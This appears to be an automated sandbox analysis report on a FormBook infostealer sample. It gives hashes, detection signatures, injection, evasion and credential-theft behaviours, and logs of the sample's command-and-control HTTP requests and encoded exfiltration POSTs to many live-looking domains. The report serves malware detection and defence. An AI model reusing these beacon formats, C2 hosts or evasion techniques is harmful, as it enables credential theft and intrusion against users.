Analysis Report mp0nMsMroT.exe

Overview

General Information

Sample Name: mp0nMsMroT.exe
Analysis ID: 286180
MD5: 26a5cbbf551c2a810792aad03ed4d51b
SHA1: b509a59df8bcbb441cb8f527c920a37e49521098
SHA256: af164cd974521a1577be7c68ed0babe78e59f94ae13f79777f8565cef148c09f

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: mp0nMsMroT.exe Virustotal: Detection: 47% Perma Link
Source: mp0nMsMroT.exe ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: mp0nMsMroT.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408454
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405098
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose, 5_2_02D7F470

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop edi 1_2_00415023
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop edi 1_2_0040C12E
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop esi 1_2_004151C5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 4x nop then pop ebx 1_2_004066D4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 5_2_02D85023
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 5_2_02D851C5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 5_2_02D7C12E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 5_2_02D766D7

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49726
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49732
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49738
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49744
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49750
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
Uses netstat to query active network connections and open ports
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.196.13.28 34.196.13.28
Source: Joe Sandbox View IP Address: 34.196.13.28 34.196.13.28
Source: Joe Sandbox View IP Address: 64.98.145.30 64.98.145.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View ASN Name: TUCOWS-3CA TUCOWS-3CA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.bestselfietools.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.bestselfietools.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bestselfietools.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 41 73 59 74 6c 2d 66 2d 77 4b 55 42 4a 4b 33 49 30 72 51 6a 30 57 75 48 41 55 44 72 71 53 75 31 6e 43 28 46 69 77 49 50 47 76 72 4d 6d 6e 4c 76 58 4b 71 5a 69 35 28 57 42 75 77 2d 6c 76 78 63 68 75 49 32 59 42 63 68 30 43 52 45 39 45 34 70 47 36 75 6a 51 31 6a 49 67 7a 4f 7a 64 65 52 6b 30 44 56 6a 74 4a 48 36 33 2d 6f 74 45 31 34 4b 6f 73 34 5f 70 30 73 48 57 49 7a 49 6d 61 75 4f 55 54 62 6b 31 4f 6a 43 6a 58 78 6e 6c 76 69 4c 69 44 71 4d 7e 7a 64 4c 28 4a 44 79 64 72 51 4f 72 55 38 50 62 36 74 53 31 41 78 59 53 79 78 34 50 48 37 47 7a 41 6e 68 78 67 63 51 32 57 6f 64 6f 75 37 7a 35 45 36 70 33 52 28 6f 79 36 67 65 49 64 50 2d 46 69 62 4d 51 30 6e 30 63 77 34 65 5a 46 50 63 4c 4e 45 58 69 6c 67 42 73 71 4f 71 34 36 30 6c 59 39 72 36 6c 5a 6b 73 45 50 50 63 6a 31 37 43 4e 6f 70 39 4f 45 55 72 39 71 48 42 35 32 74 68 45 36 75 38 45 65 5a 61 63 30 69 6d 46 35 43 46 49 69 59 79 6d 50 69 64 37 59 43 7a 66 6c 78 4e 75 46 33 68 78 44 68 54 33 73 4f 42 6e 4e 61 44 41 43 71 37 4f 48 39 36 4c 77 62 53 35 66 74 55 6c 69 71 63 51 59 50 32 6f 42 28 76 72 79 77 74 48 44 36 45 63 6d 4c 7a 6d 79 6f 6b 42 57 75 79 46 37 61 73 6e 45 39 5f 5a 6d 7e 62 4f 57 5a 67 35 45 4f 75 6f 62 5a 55 30 44 31 52 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=AsYtl-f-wKUBJK3I0rQj0WuHAUDrqSu1nC(FiwIPGvrMmnLvXKqZi5(WBuw-lvxchuI2YBch0CRE9E4pG6ujQ1jIgzOzdeRk0DVjtJH63-otE14Kos4_p0sHWIzImauOUTbk1OjCjXxnlviLiDqM~zdL(JDydrQOrU8Pb6tS1AxYSyx4PH7GzAnhxgcQ2Wodou7z5E6p3R(oy6geIdP-FibMQ0n0cw4eZFPcLNEXilgBsqOq460lY9r6lZksEPPcj17CNop9OEUr9qHB52thE6u8EeZac0imF5CFIiYymPid7YCzflxNuF3hxDhT3sOBnNaDACq7OH96LwbS5ftUliqcQYP2oB(vrywtHD6EcmLzmyokBWuyF7asnE9_Zm~bOWZg5EOuobZU0D1RgQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.homecaredispatch.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.homecaredispatch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.homecaredispatch.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 46 6c 6e 35 2d 47 4c 4d 4d 47 46 7e 67 33 5a 41 69 77 33 39 2d 4c 63 4d 5a 55 58 68 33 42 69 39 6d 61 79 63 74 52 6f 56 4d 49 72 52 4c 77 6a 6f 44 76 48 6d 34 36 39 59 44 7a 4f 30 4a 36 41 49 49 35 72 6b 4d 32 69 46 45 52 52 65 6e 77 39 78 74 56 49 44 54 41 6d 30 4d 78 47 77 4b 6e 48 58 6d 55 4d 72 75 4f 6a 30 41 34 33 35 57 72 63 6c 30 46 49 49 39 30 4a 45 59 34 75 4a 53 69 67 39 57 6e 42 33 50 77 46 32 79 6c 58 51 4a 4c 62 65 77 49 32 33 33 51 59 4b 65 4f 6c 7a 36 7e 31 4c 78 38 56 6a 6a 30 43 78 72 6b 5f 42 36 30 56 6f 64 68 5f 56 52 71 39 6b 73 54 49 64 4a 74 65 6b 4f 7a 34 70 46 68 73 77 33 53 52 75 69 6a 79 28 67 36 72 6f 36 69 4a 7a 45 31 78 77 6a 67 63 4b 71 79 6c 6d 41 38 6e 36 56 78 65 6e 64 7e 4b 71 51 61 39 43 61 38 6d 77 30 49 55 55 39 51 43 6c 59 51 50 62 5f 62 51 34 36 71 54 4b 46 48 75 54 73 71 5f 31 6a 53 67 4b 42 71 49 59 57 42 64 71 34 58 54 31 70 58 4a 44 77 32 55 31 43 52 6c 47 32 51 30 59 6b 43 43 4e 2d 58 77 50 76 54 6d 78 6b 35 64 4e 63 79 5a 28 6a 4f 68 52 4b 4d 58 7e 4a 41 76 73 49 72 36 59 74 49 5a 6f 2d 63 71 7e 76 36 42 6a 43 45 74 69 73 44 71 6f 5a 49 67 77 72 43 6d 4c 51 5a 4d 7e 6f 72 63 4e 42 6d 6c 7e 2d 54 62 72 54 67 44 6b 2d 74 35 57 69 78 43 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=7Fln5-GLMMGF~g3ZAiw39-LcMZUXh3Bi9mayctRoVMIrRLwjoDvHm469YDzO0J6AII5rkM2iFERRenw9xtVIDTAm0MxGwKnHXmUMruOj0A435Wrcl0FII90JEY4uJSig9WnB3PwF2ylXQJLbewI233QYKeOlz6~1Lx8Vjj0Cxrk_B60Vodh_VRq9ksTIdJtekOz4pFhsw3SRuijy(g6ro6iJzE1xwjgcKqylmA8n6Vxend~KqQa9Ca8mw0IUU9QClYQPb_bQ46qTKFHuTsq_1jSgKBqIYWBdq4XT1pXJDw2U1CRlG2Q0YkCCN-XwPvTmxk5dNcyZ(jOhRKMX~JAvsIr6YtIZo-cq~v6BjCEtisDqoZIgwrCmLQZM~orcNBml~-TbrTgDk-t5WixCmQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.netrworksoultions.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.netrworksoultions.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.netrworksoultions.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 79 4e 6f 53 68 67 6a 6f 69 77 55 4a 44 36 31 6b 55 79 5f 39 74 37 67 62 77 55 4e 37 36 74 62 45 6b 71 78 70 4d 7e 53 68 32 47 67 6a 34 67 66 55 4e 44 49 72 48 77 64 67 71 66 4c 71 2d 31 62 4a 30 68 36 56 76 50 51 59 44 38 48 42 32 6f 51 41 52 74 58 67 48 43 4a 54 71 75 68 71 35 7a 4f 4e 42 59 54 76 50 75 35 74 4f 58 54 6c 35 65 35 33 44 58 62 65 58 30 51 79 4f 55 49 4e 6e 6a 39 28 53 73 4c 70 59 35 56 74 67 6d 4a 79 4f 51 75 70 6a 6c 5a 65 37 6e 47 49 37 63 41 61 55 6a 5f 28 4d 49 75 41 44 4e 6d 6e 47 4f 6c 4e 61 64 77 6c 55 6e 36 7e 7a 28 2d 38 46 67 65 61 78 72 75 52 72 4a 6f 48 39 65 6f 47 44 61 55 6f 75 38 64 72 6b 73 42 51 4f 4b 6c 6c 50 30 32 4b 35 6e 6f 78 72 65 4a 73 6a 6f 50 64 42 68 75 47 5f 6f 50 30 42 69 46 4b 78 4d 31 74 36 7e 50 45 6c 35 44 35 50 53 44 39 52 75 55 56 6c 51 33 35 57 6e 4b 74 2d 31 57 74 58 65 6f 58 59 6b 7a 39 47 79 44 34 2d 41 53 43 61 44 5f 35 35 79 76 42 6c 37 79 74 59 39 47 7e 2d 5a 4f 4e 76 61 50 4e 74 77 74 47 2d 63 6d 6d 30 6a 37 7a 72 35 76 7e 39 6d 4f 36 4b 6a 69 39 37 4d 77 4e 49 64 72 65 51 35 64 66 41 59 74 50 67 63 4c 57 61 7e 66 43 6d 4b 77 65 63 28 31 62 6f 6f 68 56 5a 66 47 6b 51 70 71 64 52 55 57 30 58 64 4c 51 39 54 36 66 57 51 55 55 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WyNoShgjoiwUJD61kUy_9t7gbwUN76tbEkqxpM~Sh2Ggj4gfUNDIrHwdgqfLq-1bJ0h6VvPQYD8HB2oQARtXgHCJTquhq5zONBYTvPu5tOXTl5e53DXbeX0QyOUINnj9(SsLpY5VtgmJyOQupjlZe7nGI7cAaUj_(MIuADNmnGOlNadwlUn6~z(-8FgeaxruRrJoH9eoGDaUou8drksBQOKllP02K5noxreJsjoPdBhuG_oP0BiFKxM1t6~PEl5D5PSD9RuUVlQ35WnKt-1WtXeoXYkz9GyD4-ASCaD_55yvBl7ytY9G~-ZONvaPNtwtG-cmm0j7zr5v~9mO6Kji97MwNIdreQ5dfAYtPgcLWa~fCmKwec(1boohVZfGkQpqdRUW0XdLQ9T6fWQUUw).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.splishysplashie.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.splishysplashie.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.splishysplashie.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 58 55 70 30 38 52 58 57 41 73 49 51 4c 4d 65 6b 49 41 70 69 46 49 55 43 77 6d 6c 52 57 35 76 74 78 57 5a 4c 52 43 58 37 77 68 41 32 74 67 4e 49 4b 70 4e 6f 4b 43 48 6f 56 4d 55 62 56 43 32 33 28 59 71 75 73 68 37 6d 45 4e 7e 4f 41 50 48 4e 45 43 68 34 52 75 79 53 44 54 4e 54 36 78 79 33 38 54 59 74 61 5a 53 44 52 66 44 68 32 78 54 52 66 55 57 64 64 4a 66 36 5a 55 34 6e 65 70 59 69 52 69 42 79 39 59 28 39 77 6a 28 73 77 58 4d 6d 5a 2d 62 63 32 64 6c 4f 42 6a 79 36 74 44 6e 42 54 77 39 6e 78 67 48 54 37 71 57 4f 48 59 30 5f 59 6f 7e 35 6e 37 6c 72 51 6f 50 43 67 62 33 46 67 53 69 63 32 35 4c 75 44 41 74 51 34 6d 36 59 36 63 6a 47 73 73 6a 4c 71 5a 72 7a 7a 67 31 58 4a 53 61 7a 78 4f 69 55 34 37 44 4c 5a 6f 66 64 6a 79 58 38 42 41 75 6d 71 43 43 78 6e 43 68 43 68 42 67 68 5a 68 45 65 36 58 33 74 43 35 52 50 74 45 43 37 54 62 51 79 6c 7a 73 37 70 54 7e 66 55 46 38 31 77 6d 74 52 28 43 70 69 73 2d 35 77 74 41 4d 32 45 77 6b 70 6f 4c 34 2d 49 53 34 55 43 39 79 56 58 6c 31 77 79 49 6c 5a 41 43 70 50 54 35 4b 47 47 62 79 55 74 46 79 31 4c 4b 6f 78 68 69 46 51 4c 58 57 4f 4f 46 4c 6b 47 53 71 63 64 5a 70 46 48 5a 36 4a 4d 4c 7e 6a 36 69 33 66 66 5f 48 68 43 78 34 71 5a 4b 6a 58 34 41 5a 62 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=XUp08RXWAsIQLMekIApiFIUCwmlRW5vtxWZLRCX7whA2tgNIKpNoKCHoVMUbVC23(Yqush7mEN~OAPHNECh4RuySDTNT6xy38TYtaZSDRfDh2xTRfUWddJf6ZU4nepYiRiBy9Y(9wj(swXMmZ-bc2dlOBjy6tDnBTw9nxgHT7qWOHY0_Yo~5n7lrQoPCgb3FgSic25LuDAtQ4m6Y6cjGssjLqZrzzg1XJSazxOiU47DLZofdjyX8BAumqCCxnChChBghZhEe6X3tC5RPtEC7TbQylzs7pT~fUF81wmtR(Cpis-5wtAM2EwkpoL4-IS4UC9yVXl1wyIlZACpPT5KGGbyUtFy1LKoxhiFQLXWOOFLkGSqcdZpFHZ6JML~j6i3ff_HhCx4qZKjX4AZbCA).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.ugpounds.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ugpounds.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ugpounds.info/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6a 78 59 68 5a 6e 34 33 31 72 6e 70 52 2d 42 49 39 56 34 44 57 35 64 51 6c 4e 4a 65 35 38 6c 34 6d 67 7e 64 33 77 4d 41 70 49 61 76 72 35 61 45 79 57 4c 30 6a 43 30 4e 49 45 56 72 6e 77 56 75 79 65 34 35 6e 6d 66 33 43 74 62 54 45 75 62 68 77 59 53 46 33 7a 52 37 6e 78 50 69 31 52 68 54 30 69 66 6c 48 45 4a 79 51 6b 46 32 38 77 4d 6c 77 53 4d 74 31 41 41 77 32 74 76 37 42 72 36 71 68 50 44 70 51 2d 45 35 38 52 32 4c 74 31 7e 7a 54 33 65 66 44 42 78 65 4f 43 63 30 72 5f 78 30 59 47 7e 51 6a 33 72 76 79 4c 48 39 55 33 66 50 6e 5f 59 6f 65 48 7a 4e 77 31 39 35 50 38 51 45 6c 65 69 6d 77 6d 49 51 6a 58 46 57 30 5a 44 44 4c 4d 6f 78 67 38 34 61 28 57 7a 39 7a 66 46 6b 67 4c 66 2d 41 64 37 56 74 43 6d 39 6a 5f 72 7a 4c 35 6f 6d 79 49 76 36 65 47 39 55 54 50 66 58 70 4d 4d 59 35 59 45 56 51 76 7a 4a 4c 39 64 50 6c 57 73 4f 28 74 6e 54 36 46 63 32 30 51 69 4f 28 5a 34 70 6a 5a 68 67 62 46 37 5a 6f 55 47 32 4a 78 52 39 56 6f 43 74 69 39 4b 53 42 6a 65 38 4d 67 4b 46 53 4d 65 78 42 37 42 67 4f 54 71 61 48 73 30 4b 4e 35 4b 43 65 4e 41 64 46 65 31 59 55 6c 6a 33 4d 73 56 31 73 6a 30 38 4a 4b 61 2d 4f 2d 31 54 65 74 38 6f 44 4b 78 49 70 2d 68 6f 51 4d 39 75 30 45 45 78 4d 4f 28 38 56 69 63 75 6a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 